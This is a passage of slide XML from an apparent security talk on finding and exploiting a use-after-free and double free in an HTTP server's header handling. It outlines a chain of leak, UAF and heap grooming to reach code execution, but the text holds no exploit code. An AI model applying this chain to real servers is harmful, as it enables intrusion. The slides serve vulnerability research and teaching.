          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403977" y="2482973"/>
            <a:ext cx="129733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4268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C375-7984-A44D-B7B4-67FB60EE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with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hexdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="LibC and Heap Leak in hexdump">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87708092-12D0-2940-BFA8-F429CFFD9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38" y="2322516"/>
            <a:ext cx="8270312" cy="1640104"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9538CB43-BB27-3049-8508-BC55E56F0BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228948" y="2707965"/>
            <a:ext cx="240898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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2C5D49-EF4B-D546-98F0-A7D6240076C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697115" y="3108940"/>
            <a:ext cx="240898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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3E5C0B-71D6-1B4B-B908-A3CE4AB557BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166804" y="3103297"/>
            <a:ext cx="247112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ype confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C37095-617A-BA46-B802-0FEB16F4DDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697115" y="3477639"/>
            <a:ext cx="247112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DC9981-BA72-5A49-9D17-38D23718EBF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726097" y="1742519"/>
            <a:ext cx="22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LibC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22C33-3D68-944C-8AD6-896F1274DFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530136" y="1425935"/>
            <a:ext cx="22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52DEE6-E028-B049-B5EF-6381CC1520F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204839" y="1742519"/>
            <a:ext cx="133165" cy="17351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18B7B4-07EC-0A4F-A537-26FA2AE71B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351321" y="1742519"/>
            <a:ext cx="1808912" cy="136077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2F10A3-6C6B-DC46-B82C-7713DE4737E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962421" y="2011459"/>
            <a:ext cx="154294" cy="41144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F69C53-03B3-6941-B406-EA67EC2A3021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4140192" y="2032891"/>
            <a:ext cx="1626920" cy="75934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055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66D0-C7B7-C244-A27D-085A437B5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87" y="841772"/>
            <a:ext cx="8859915" cy="1790700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Exploit Chain - UAF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057F4-E4FE-8547-B43C-F45981B2E7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trike="sngStrike" dirty="0"/>
              <a:t>Leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + Grooming = code execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713778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2AA4-E092-7146-BE5D-7A23E961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Tracing a Use After Free – 1 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A3A3923F-BA97-1FE9-061D-51B0BC66B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Free Then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0646-0A80-5348-A937-C3B987AFE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4180644" cy="276344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Identify calls to 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free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the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Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of this variable afterwards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there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.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050" name="Picture 2" descr="New digital tools could speed up Covid-19 contact tracing - STAT">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CA09D9-FC0C-2A48-B0C5-E520D3F8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0486" y="1016053"/>
            <a:ext cx="3558055" cy="199251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Free then Use vuln">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB23D6A-C01C-EF42-BA52-23402D7B9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486" y="3085268"/>
            <a:ext cx="3768250" cy="198039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C272-142B-4349-8151-5DEBE92254C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="4995920"/>
            <a:ext cx="228389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6825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Use After Free!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9" y="1236540"/>
            <a:ext cx="4797547" cy="369944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Not always a linear code path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Finding the vulnerability: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Call to free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Usage after the free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Bugs run in groups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ASAN is GREAT for validating/fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B63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870" y="1409216"/>
            <a:ext cx="4115638" cy="232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1697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8155-E6F8-6E48-BD78-EA9F8C13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 The Incoming Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Interpret all of the headers one by one">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D339DF53-0C9F-F149-8D5F-A67A21987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062971"/>
            <a:ext cx="7886700" cy="2066568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379886-93FB-A34C-9A03-CB84BDA6DAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162502" y="1940953"/>
            <a:ext cx="7352848" cy="2763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5B1B53-4098-3A42-897D-CE76DCDAF8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="3204839"/>
            <a:ext cx="7885508" cy="143741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Set BODY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="sng" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 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Content-Length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Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>etc.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7630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AEFC-0800-4F40-B10A-9A60B2DC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Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header creates a use after free ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DECDB96-AD41-064C-86F2-CEE52311B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270216"/>
            <a:ext cx="7886700" cy="3196793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CAFA55-685B-DF45-BF80-FE624A7EF01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632281" y="3389062"/>
            <a:ext cx="408493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2497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AEFC-0800-4F40-B10A-9A60B2DC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Header Creates UAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header creates a use after free ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DECDB96-AD41-064C-86F2-CEE52311B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741" b="33719"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565901" y="1428214"/>
            <a:ext cx="7886700" cy="273000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CAFA55-685B-DF45-BF80-FE624A7EF01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579015" y="1716761"/>
            <a:ext cx="408493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8" descr="Interpret all of the headers one by one">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36136F79-01BC-B741-8FB1-A98DE5A7B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1" y="2269064"/>
            <a:ext cx="7886700" cy="20665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4C7FD8-03F7-7449-A81B-728569A19CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1465085" y="3476020"/>
            <a:ext cx="408493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9F7183-DBE3-924F-B270-B9AC2BAB93D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021432" y="3193415"/>
            <a:ext cx="3057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1439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6D04921-A03B-4034-03F5-6A1DEE53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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of concept – HTML </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header use after free proof of concept">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF65201A-76A5-2F42-B6BA-F23EF7DB2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24911"/>
            <a:ext cx="7886700" cy="2030826"/>
          </a:xfrm>
          <a:noFill/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92DAC3-132B-4E4F-877C-714288702030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3605340" y="1890944"/>
            <a:ext cx="1339522" cy="134052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BC8A64-FBE2-7840-91DC-326E3DF10116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1350914" y="2500508"/>
            <a:ext cx="0" cy="84637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818DBB-B39D-CB48-BECF-5ECBAB529A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209459" y="3231472"/>
            <a:ext cx="4797547" cy="170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0751F1-9420-1944-B9CD-57554A1D6C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209460" y="3231472"/>
            <a:ext cx="3536918" cy="170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Use the header ‘BBB’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Use after free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A71FB05-CB64-2147-B8E1-ED9DC47562FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3166622"/>
            <a:ext cx="3536918" cy="170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1. Free the header ‘BBB’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F9A788-F562-3943-A7EA-89DB2EE6FDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2083706"/>
            <a:ext cx="305718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1B857C-72B7-574C-BBB1-EE21B599C519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2542122"/>
            <a:ext cx="65861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617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CF51-ABC0-3841-BE22-B6E882DC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 – Crash </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Use after free on req_header_lst. Name does NOT have a pointer, which leads to a crash. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B803BD-F4DA-D84F-973A-228A0F8EF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823" y="1372070"/>
            <a:ext cx="9147823" cy="1417999"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Object with use after free on it. Name does NOT have a pointer here to use">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E799E40-6FC7-034F-AE78-CC4681402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94120"/>
            <a:ext cx="5005488" cy="22493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4DFEBC-0CD8-574C-9CB0-E5D04804512C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3107184" y="1862103"/>
            <a:ext cx="292075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47957A-9723-5B44-9F5D-009AC886F0EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3719016"/>
            <a:ext cx="162461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80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29B0-1D8E-B04C-92D1-0C10C952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– Body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1BD27-1D52-2744-938A-CD523372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being sent in the request – BODY LINE 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D343B14F-E5E6-8847-9552-DDFBD0565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0" b="32677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2571750"/>
            <a:ext cx="8237687" cy="11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222F73-F399-BB47-B9A5-77EA72F9E90C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394910" y="3906959"/>
            <a:ext cx="4698347" cy="757843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E1DDDD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BODY Line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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BODY Line 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42157737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D613-4B00-EB46-9298-9D3BACD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 Result (ASAN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="ASAN finds use after free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06474FCA-AAF4-3944-A911-3568DE467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68019"/>
            <a:ext cx="9116132" cy="534148"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="ASAN finds use after free with 8 byte read">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE437BF1-D685-3D44-B176-7751ACA3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868" y="1863331"/>
            <a:ext cx="9144000" cy="797719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Use after free on header within simply reading a field">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{778D6459-A796-C447-9668-399A4B46A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868" y="3250412"/>
            <a:ext cx="9144000" cy="9863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A14B09-1EAB-E44F-965F-7EDA1C026763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507994" y="3495594"/>
            <a:ext cx="408493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702DD-2C8E-1A4F-9140-5C2BC5FF37A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27868" y="2661050"/>
            <a:ext cx="174125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2634E-A60E-3944-8B58-D29E4111B53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205083" y="1517310"/>
            <a:ext cx="23079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7925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ouble free - do NOT crash on the read">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0E64E2-7451-1849-A604-1F0C86C76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68019"/>
            <a:ext cx="7164436" cy="177225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D04921-A03B-4034-03F5-6A1DEE53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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of concept – HTML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92DAC3-132B-4E4F-877C-714288702030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1815232" y="2672179"/>
            <a:ext cx="3129630" cy="55929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818DBB-B39D-CB48-BECF-5ECBAB529A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209459" y="3231472"/>
            <a:ext cx="4797547" cy="170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0751F1-9420-1944-B9CD-57554A1D6C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209460" y="3231472"/>
            <a:ext cx="3536918" cy="170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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Use the header ‘BBB’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Use after free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A71FB05-CB64-2147-B8E1-ED9DC47562FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3166622"/>
            <a:ext cx="3536918" cy="170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1. Free the header ‘BBB’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F9A788-F562-3943-A7EA-89DB2EE6FDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2083706"/>
            <a:ext cx="62310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1B857C-72B7-574C-BBB1-EE21B599C519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2542122"/>
            <a:ext cx="284251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3615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he use after free turns into a double free :) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD06587-F36A-7747-BF07-4F5013EE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Free!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Freeing the headers. Creates a double free opportunity ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660A0C7F-A720-0940-816F-0778694D3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530" y="2241443"/>
            <a:ext cx="6083300" cy="2781300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29CBE-A82E-E04A-8C42-AD81524EB81B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978055" y="4291023"/>
            <a:ext cx="458254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7E29-5FE1-7346-8BA5-34437CBF188F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978054" y="3937395"/>
            <a:ext cx="531939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B598D1-D1BC-9C4B-9D58-356A72FC691D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978053" y="3620405"/>
            <a:ext cx="531939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C0DB52-AA88-AC48-B9A7-CD783700DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299530" y="1687609"/>
            <a:ext cx="6761395" cy="563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cleanup_request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frees the headers AGAIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6602009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2685-F1D9-0444-8588-30207429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UAF or DF?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72C51-403E-014F-B4F6-2918E38C9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After Free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EFD2B-A355-D44C-8BCF-114A651B23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Less steps for exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
